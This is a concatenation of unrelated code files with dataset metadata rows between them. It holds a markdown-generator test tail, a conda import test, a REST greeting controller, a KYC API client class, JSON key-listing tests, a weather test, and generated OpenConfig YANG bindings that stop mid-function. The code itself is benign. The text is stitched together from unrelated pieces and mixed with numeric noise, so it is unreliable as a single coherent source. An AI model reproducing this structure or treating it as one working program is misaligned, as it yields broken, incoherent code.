   at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
   at Object.Search: Search for secret (/tests/e2e/adminSearch.test.js:34:16)
```
### :x: viewerSearch.test -> Search: Viewer is NOT able to edit configmaps
```
   at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
   at Object.Search: Viewer is NOT able to edit configmaps (/tests/e2e/viewerSearch.test.js:41:16)
```
""")
# Allow running this test module directly: `python testMarkdownGenerator.py`.
if __name__ == '__main__':
    unittest.main()
| 49.633523
| 157
| 0.718219
| 2,331
| 17,471
| 5.222222
| 0.099099
| 0.102522
| 0.086749
| 0.102522
| 0.970919
| 0.968537
| 0.968537
| 0.968537
| 0.958679
| 0.951779
| 0
| 0.047037
| 0.143323
| 17,471
| 352
| 158
| 49.633523
| 0.766286
| 0
| 0
| 0.868132
| 0
| 0.241758
| 0.864812
| 0.093922
| 0
| 0
| 0
| 0
| 0.010989
| 1
| 0.010989
| false
| 0.021978
| 0.058608
| 0
| 0.080586
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4ceae7dfc09d929e5073ff9de80b4666670c99ab
| 53
|
py
|
Python
|
PythonFiles/Miniconda2/pkgs/wincertstore-0.2-py27hf04cefb_0/info/test/run_test.py
|
manos-mark/WebCamera-Head-and-Gaze-tracking
|
5001196f2e9ef31a653ee66efed979b3d10452e8
|
[
"MIT"
] | null | null | null |
PythonFiles/Miniconda2/pkgs/wincertstore-0.2-py27hf04cefb_0/info/test/run_test.py
|
manos-mark/WebCamera-Head-and-Gaze-tracking
|
5001196f2e9ef31a653ee66efed979b3d10452e8
|
[
"MIT"
] | null | null | null |
PythonFiles/Miniconda2/pkgs/wincertstore-0.2-py27hf04cefb_0/info/test/run_test.py
|
manos-mark/WebCamera-Head-and-Gaze-tracking
|
5001196f2e9ef31a653ee66efed979b3d10452e8
|
[
"MIT"
] | null | null | null |
# Conda package smoke test: announce and then verify that the
# `wincertstore` package is importable (import failure fails the test).
print("import: 'wincertstore'")
import wincertstore
| 13.25
| 31
| 0.773585
| 5
| 53
| 8.2
| 0.6
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09434
| 53
| 3
| 32
| 17.666667
| 0.854167
| 0
| 0
| 0
| 0
| 0
| 0.423077
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
e21de50ac69fdc7b85e83308fb7a303edbdb6801
| 826
|
py
|
Python
|
test_performance/load_server/controllers/teste_controller_async.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1
|
2021-10-14T07:27:47.000Z
|
2021-10-14T07:27:47.000Z
|
test_performance/load_server/controllers/teste_controller_async.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 4
|
2019-08-06T02:26:32.000Z
|
2021-06-10T21:39:19.000Z
|
test_performance/load_server/controllers/teste_controller_async.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1
|
2018-05-11T18:04:41.000Z
|
2018-05-11T18:04:41.000Z
|
def get_hello(name: str) -> tuple:  # noqa: E501
    """Build a greeting response for the given name.

    :param name: name to include in the greeting
    :type name: str
    :rtype: tuple of (response body dict, HTTP status code)
    """
    body = {"response": f" ola {name}. bem vindo ao clube"}
    return body, 200
# import aiohttp
# from connexion.lifecycle import ConnexionResponse
# async def get_hello(name: str) -> tuple: # noqa: E501
# """
# # noqa: E501
# :param name:
# :type name: str
# :rtype: None
# """
# return aiohttp.web.json_response(
# {"response": f" ola {name}. bem vindo ao clube"}, 200
# )
# async def get_hello(name: str) -> tuple: # noqa: E501
# """
# # noqa: E501
# :param name:
# :type name: str
# :rtype: None
# """
# return aiohttp.web.json_response(
# {"response": f" ola {name}. bem vindo ao clube"}, 200
# )
| 18.355556
| 64
| 0.533898
| 98
| 826
| 4.44898
| 0.306122
| 0.09633
| 0.075688
| 0.103211
| 0.866972
| 0.866972
| 0.866972
| 0.866972
| 0.866972
| 0.788991
| 0
| 0.047285
| 0.308717
| 826
| 45
| 65
| 18.355556
| 0.716287
| 0.762712
| 0
| 0
| 0
| 0
| 0.276596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e23876dfd67852c5d0bb2e1f1388732ee9ca0868
| 76
|
py
|
Python
|
rgbd_seg/loggers/__init__.py
|
tomchol/ShapeConv
|
41ead20854daed43b59ef978665fa53f113cbb65
|
[
"Apache-2.0"
] | 57
|
2021-08-03T08:03:56.000Z
|
2022-03-25T12:17:44.000Z
|
rgbd_seg/loggers/__init__.py
|
tomchol/ShapeConv
|
41ead20854daed43b59ef978665fa53f113cbb65
|
[
"Apache-2.0"
] | 6
|
2021-08-30T10:06:46.000Z
|
2022-03-08T12:47:20.000Z
|
rgbd_seg/loggers/__init__.py
|
tomchol/ShapeConv
|
41ead20854daed43b59ef978665fa53f113cbb65
|
[
"Apache-2.0"
] | 8
|
2021-08-13T08:32:54.000Z
|
2022-03-25T11:12:13.000Z
|
from .builder import build_logger
from .builder import build_summarys_writer
| 38
| 42
| 0.881579
| 11
| 76
| 5.818182
| 0.636364
| 0.34375
| 0.53125
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092105
| 76
| 2
| 42
| 38
| 0.927536
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e2399a0115b6732db1be06cd443b1e0905146ec7
| 3,445
|
py
|
Python
|
ost_kyc_sdk_python/saas/users_kyc.py
|
OpenSTFoundation/kyc-sdk-python
|
095d789e11a48a1578c73370cf88170196e7ebae
|
[
"MIT"
] | 13
|
2019-02-27T14:38:30.000Z
|
2019-02-28T15:44:36.000Z
|
ost_kyc_sdk_python/saas/users_kyc.py
|
ostdotcom/ost-kyc-sdk-python
|
095d789e11a48a1578c73370cf88170196e7ebae
|
[
"MIT"
] | null | null | null |
ost_kyc_sdk_python/saas/users_kyc.py
|
ostdotcom/ost-kyc-sdk-python
|
095d789e11a48a1578c73370cf88170196e7ebae
|
[
"MIT"
] | 2
|
2018-12-14T07:31:57.000Z
|
2018-12-26T21:42:46.000Z
|
from .base import Base
class UsersKYC(Base):
    """Client for the `/api/v2/users-kyc` endpoints of the OST KYC API.

    Every public method returns the dict produced by the HTTP helper.
    The repeated validate-user_id / build-endpoint / strip-user_id sequence
    is factored into `_user_endpoint` so each call site states only its
    HTTP verb and path suffix.
    """

    def __init__(self, params):
        Base.__init__(self, params)
        self.endpoint = '/api/v2/users-kyc'

    def _user_endpoint(self, params, suffix=""):
        """Validate `user_id` in params, remove it, and return the user path.

        Raises (via `raise_exception_if_param_absent_or_invalid`) when
        `user_id` is missing or invalid. Mutates `params` by deleting
        `user_id`, matching the original per-method behavior.
        """
        self.raise_exception_if_param_absent_or_invalid(params, 'user_id')
        endpoint = self.endpoint + "/" + str(params.get('user_id')) + suffix
        self.delete_key_from_params(params, 'user_id')
        return endpoint

    # Submit KYC. Author: Mayur, 20/11/2018. Returns dict.
    def submit_kyc(self, params):
        """Submit KYC details; `params` must contain `user_id`."""
        return self.http_helper.send_post_request(
            self._user_endpoint(params), params)

    # Get a user's KYC information. Author: Mayur, 20/11/2018. Returns dict.
    def get(self, params=None):
        """Fetch one user's KYC record; `user_id` is mandatory in params."""
        params = params or {}
        return self.http_helper.send_get_request(
            self._user_endpoint(params), params)

    # List users' KYC information. Author: Mayur, 20/11/2018. Returns dict.
    def list(self, params=None):
        """Return the list of users' KYC information."""
        params = params or {}
        return self.http_helper.send_get_request(self.endpoint, params)

    # Presigned URL for PUT. Author: Mayur, 20/11/2018. Returns dict.
    def get_pre_signed_url_put(self, params):
        """Get a presigned upload URL for a PUT request."""
        suffix = "/pre-signed-urls/for-put"
        return self.http_helper.send_get_request(
            self.endpoint + suffix, params)

    # Presigned URL for POST. Author: Mayur, 20/11/2018. Returns dict.
    def get_pre_signed_url_post(self, params):
        """Get a presigned upload URL for a POST request."""
        suffix = "/pre-signed-urls/for-post"
        return self.http_helper.send_get_request(
            self.endpoint + suffix, params)

    # Email KYC approve. Author: Mayur, 14/12/2018. Returns dict.
    def email_approve(self, params):
        """Trigger the KYC-approved email for a user."""
        return self.http_helper.send_post_request(
            self._user_endpoint(params, '/email/approve'), params)

    # Email KYC deny. Author: Mayur, 14/12/2018. Returns dict.
    def email_deny(self, params):
        """Trigger the KYC-denied email for a user."""
        return self.http_helper.send_post_request(
            self._user_endpoint(params, '/email/deny'), params)

    # Email report-issue. Author: Mayur, 14/12/2018. Returns dict.
    # (Also fixes the stray space in the original `email_report_issue (self`.)
    def email_report_issue(self, params):
        """Trigger the report-issue email for a user."""
        return self.http_helper.send_post_request(
            self._user_endpoint(params, '/email/report-issue'), params)
| 28.00813
| 92
| 0.609869
| 428
| 3,445
| 4.661215
| 0.156542
| 0.04812
| 0.066165
| 0.080201
| 0.839098
| 0.818045
| 0.789975
| 0.752882
| 0.752882
| 0.729825
| 0
| 0.02601
| 0.274601
| 3,445
| 122
| 93
| 28.237705
| 0.772309
| 0.215965
| 0
| 0.52381
| 0
| 0
| 0.083491
| 0.018596
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0
| 0.02381
| 0
| 0.452381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e266410f2403d5d666d6f8cfba6a8b48f28c7101
| 2,256
|
py
|
Python
|
tests/test_listkeys.py
|
json-transformations/jsonls
|
5f5ac2c84fb165e54da075e9244c71581808262e
|
[
"MIT"
] | null | null | null |
tests/test_listkeys.py
|
json-transformations/jsonls
|
5f5ac2c84fb165e54da075e9244c71581808262e
|
[
"MIT"
] | null | null | null |
tests/test_listkeys.py
|
json-transformations/jsonls
|
5f5ac2c84fb165e54da075e9244c71581808262e
|
[
"MIT"
] | null | null | null |
from jsonls.core import get_keylists, get_keystrings
def test_get_simple_keylists():
    """get_keylists yields every key path of a shallow mapping as tuples."""
    sample = {"status": "success", "message": {"affenpinscher": []}}
    expected = [
        (),
        ("message",),
        ("message", "affenpinscher", "*"),
        ("status",),
    ]
    assert sorted(get_keylists(sample)) == expected
def test_get_nested_keylists():
    """get_keylists descends through nested dicts and lists, marking list
    positions with '*'; leftover debug printing removed."""
    data = {"Solar System": {"planets": [{"name": "Mars", "moons": [{"name":
        "Phobos", "craters": [{"name": "Clustril", "diameter (km)": 3.4}, {
        "name": "D'Arrest", "diameter (km)": 2.1}]}]}]}}
    expect = [
        (),
        ('Solar System',),
        ('Solar System', 'planets', '*'),
        ('Solar System', 'planets', '*', 'moons', '*'),
        ('Solar System', 'planets', '*', 'moons', '*', 'craters', '*'),
        ('Solar System', 'planets', '*', 'moons', '*', 'craters', '*',
         'diameter (km)'),
        ('Solar System', 'planets', '*', 'moons', '*', 'craters', '*', 'name'),
        ('Solar System', 'planets', '*', 'moons', '*', 'name'),
        ('Solar System', 'planets', '*', 'name')
    ]
    result = sorted(get_keylists(data))
    assert result == expect
def test_get_simple_keystrings():
    """get_keystrings renders each key path as a dotted string."""
    sample = {"status": "success", "message": {"affenpinscher": []}}
    expected = [
        ".",
        ".message",
        ".message.affenpinscher.*",
        ".status",
    ]
    assert list(get_keystrings(sample)) == expected
def test_get_nested_keystrings():
    """get_keystrings renders nested paths dot-joined with '*' for list
    positions; leftover debug printing removed."""
    data = {"Solar System": {"planets": [{"name": "Mars", "moons": [{"name":
        "Phobos", "craters": [{"name": "Clustril", "diameter (km)": 3.4},
        {"name": "D'Arrest", "diameter (km)": 2.1}]}]}]}}
    expect = [
        '.',
        '.Solar System',
        '.Solar System.planets.*',
        '.Solar System.planets.*.moons.*',
        '.Solar System.planets.*.moons.*.craters.*',
        '.Solar System.planets.*.moons.*.craters.*.diameter (km)',
        '.Solar System.planets.*.moons.*.craters.*.name',
        '.Solar System.planets.*.moons.*.name',
        '.Solar System.planets.*.name'
    ]
    result = list(get_keystrings(data))
    assert result == expect
| 32.695652
| 79
| 0.511525
| 210
| 2,256
| 5.409524
| 0.2
| 0.174296
| 0.253521
| 0.202465
| 0.859155
| 0.792254
| 0.767606
| 0.767606
| 0.700704
| 0.700704
| 0
| 0.004753
| 0.253989
| 2,256
| 68
| 80
| 33.176471
| 0.670232
| 0
| 0
| 0.333333
| 0
| 0
| 0.37367
| 0.094858
| 0
| 0
| 0
| 0
| 0.066667
| 1
| 0.066667
| false
| 0
| 0.016667
| 0
| 0.083333
| 0.05
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e2a17ec49d5024de9f91d125a69780e02d80b6e5
| 133
|
py
|
Python
|
src/tests/test_weather.py
|
pckltr/Pi_Weather_Station
|
6222b4ed77e92096bbed6fea3f8603e27e76bf30
|
[
"MIT"
] | 9
|
2019-05-12T17:43:39.000Z
|
2021-12-04T19:20:02.000Z
|
src/tests/test_weather.py
|
pckltr/Pi_Weather_Station
|
6222b4ed77e92096bbed6fea3f8603e27e76bf30
|
[
"MIT"
] | 2
|
2019-11-02T21:10:35.000Z
|
2020-02-07T10:30:16.000Z
|
src/tests/test_weather.py
|
pckltr/Pi_Weather_Station
|
6222b4ed77e92096bbed6fea3f8603e27e76bf30
|
[
"MIT"
] | 6
|
2019-05-22T14:32:01.000Z
|
2021-12-25T18:28:13.000Z
|
import pytest
from src.weather import set_screen_color
def test_set_screen_color():
    """A reading of 25 maps to the expected RGB triple."""
    expected_rgb = [0, 0, 155]
    assert set_screen_color(25) == expected_rgb
| 19
| 46
| 0.759398
| 22
| 133
| 4.272727
| 0.636364
| 0.287234
| 0.446809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061947
| 0.150376
| 133
| 6
| 47
| 22.166667
| 0.769912
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2c7f3eb86e4c0ff3e0cca16a82a82efd2b1aa919
| 39,868
|
py
|
Python
|
napalm_yang/models/openconfig/network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 64
|
2016-10-20T15:47:18.000Z
|
2021-11-11T11:57:32.000Z
|
napalm_yang/models/openconfig/network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 126
|
2016-10-05T10:36:14.000Z
|
2019-05-15T08:43:23.000Z
|
napalm_yang/models/openconfig/network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 63
|
2016-11-07T15:23:08.000Z
|
2021-09-22T14:41:16.000Z
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import config
from . import state
from . import local_
from . import remote
# NOTE(review): this class is machine-generated by pyangbind from the
# openconfig-network-instance YANG model. Do not hand-edit the logic —
# regenerate from the YANG source instead; comments below are for readers only.
class endpoint(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/connection-points/connection-point/endpoints/endpoint. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.
    YANG Description: A list of the endpoints (interfaces or remote
    connection points that can be used for this
    connection point). The active endpoint is selected
    based on the precedence that it is configured
    with
    """

    # Restrict instances to the generated attribute set; one slot per YANG
    # child node plus the pyangbind plumbing attributes.
    __slots__ = (
        "_path_helper",
        "_extmethods",
        "__endpoint_id",
        "__config",
        "__state",
        "__local_",
        "__remote",
    )

    # Name and generator tag used by PybindBase for path/serialisation logic.
    _yang_name = "endpoint"
    _pybind_generated_by = "container"

    def __init__(self, *args, **kwargs):
        # Hooks stay disabled until a parent container registers real ones.
        self._path_helper = False
        self._extmethods = False
        # One YANGDynClass wrapper per YANG child: the leafref key
        # `endpoint-id` plus four child containers.
        self.__endpoint_id = YANGDynClass(
            base=six.text_type,
            is_leaf=True,
            yang_name="endpoint-id",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            is_keyval=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="leafref",
            is_config=True,
        )
        self.__config = YANGDynClass(
            base=config.config,
            is_container="container",
            yang_name="config",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )
        self.__local_ = YANGDynClass(
            base=local_.local_,
            is_container="container",
            yang_name="local",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )
        self.__remote = YANGDynClass(
            base=remote.remote,
            is_container="container",
            yang_name="remote",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )
        # Copy-constructor path: a single positional argument is treated as
        # an object with the same pyangbind elements; changed values are
        # copied across via the generated _set_* methods.
        load = kwargs.pop("load", None)
        if args:
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # When attached to a parent, extend its path; otherwise return the
        # absolute YANG path of this container.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "connection-points",
                "connection-point",
                "endpoints",
                "endpoint",
            ]

    def _get_endpoint_id(self):
        """
        Getter method for endpoint_id, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/endpoint_id (leafref)
        YANG Description: A pointer to the configured identifier for the
        endpoint
        """
        return self.__endpoint_id

    def _set_endpoint_id(self, v, load=False):
        """
        Setter method for endpoint_id, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/endpoint_id (leafref)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_endpoint_id is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_endpoint_id() directly.
        YANG Description: A pointer to the configured identifier for the
        endpoint
        """
        # List keys may not be mutated once the entry is in a list, except
        # when the value is being loaded (load=True).
        parent = getattr(self, "_parent", None)
        if parent is not None and load is False:
            raise AttributeError(
                "Cannot set keys directly when" + " within an instantiated list"
            )
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=six.text_type,
                is_leaf=True,
                yang_name="endpoint-id",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                is_keyval=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="leafref",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """endpoint_id must be of a type compatible with leafref""",
                    "defined-type": "leafref",
                    "generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="endpoint-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='leafref', is_config=True)""",
                }
            )
        self.__endpoint_id = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_endpoint_id(self):
        # Reset endpoint_id to a fresh default wrapper.
        self.__endpoint_id = YANGDynClass(
            base=six.text_type,
            is_leaf=True,
            yang_name="endpoint-id",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            is_keyval=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="leafref",
            is_config=True,
        )

    def _get_config(self):
        """
        Getter method for config, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/config (container)
        YANG Description: Configuration parameters relating to the
        endpoint
        """
        return self.__config

    def _set_config(self, v, load=False):
        """
        Setter method for config, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/config (container)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_config is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_config() directly.
        YANG Description: Configuration parameters relating to the
        endpoint
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=config.config,
                is_container="container",
                yang_name="config",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="container",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """config must be of a type compatible with container""",
                    "defined-type": "container",
                    "generated-type": """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
                }
            )
        self.__config = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_config(self):
        # Reset config to a fresh default container.
        self.__config = YANGDynClass(
            base=config.config,
            is_container="container",
            yang_name="config",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )

    def _get_state(self):
        """
        Getter method for state, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/state (container)
        YANG Description: Operational state parameters relating to the
        endpoint
        """
        return self.__state

    def _set_state(self, v, load=False):
        """
        Setter method for state, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/state (container)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_state is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_state() directly.
        YANG Description: Operational state parameters relating to the
        endpoint
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=state.state,
                is_container="container",
                yang_name="state",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="container",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """state must be of a type compatible with container""",
                    "defined-type": "container",
                    "generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
                }
            )
        self.__state = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_state(self):
        # Reset state to a fresh default container.
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )

    def _get_local_(self):
        """
        Getter method for local_, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/local (container)
        YANG Description: Configuration and operational state parameters
        relating to a local interface
        """
        return self.__local_

    def _set_local_(self, v, load=False):
        """
        Setter method for local_, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/local (container)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_local_ is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_local_() directly.
        YANG Description: Configuration and operational state parameters
        relating to a local interface
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=local_.local_,
                is_container="container",
                yang_name="local",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="container",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """local_ must be of a type compatible with container""",
                    "defined-type": "container",
                    "generated-type": """YANGDynClass(base=local_.local_, is_container='container', yang_name="local", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
                }
            )
        self.__local_ = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_local_(self):
        # Reset local_ to a fresh default container.
        self.__local_ = YANGDynClass(
            base=local_.local_,
            is_container="container",
            yang_name="local",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )

    def _get_remote(self):
        """
        Getter method for remote, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/remote (container)
        YANG Description: Configuration and operational state parameters
        relating to a remote interface
        """
        return self.__remote

    def _set_remote(self, v, load=False):
        """
        Setter method for remote, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/remote (container)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_remote is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_remote() directly.
        YANG Description: Configuration and operational state parameters
        relating to a remote interface
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=remote.remote,
                is_container="container",
                yang_name="remote",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
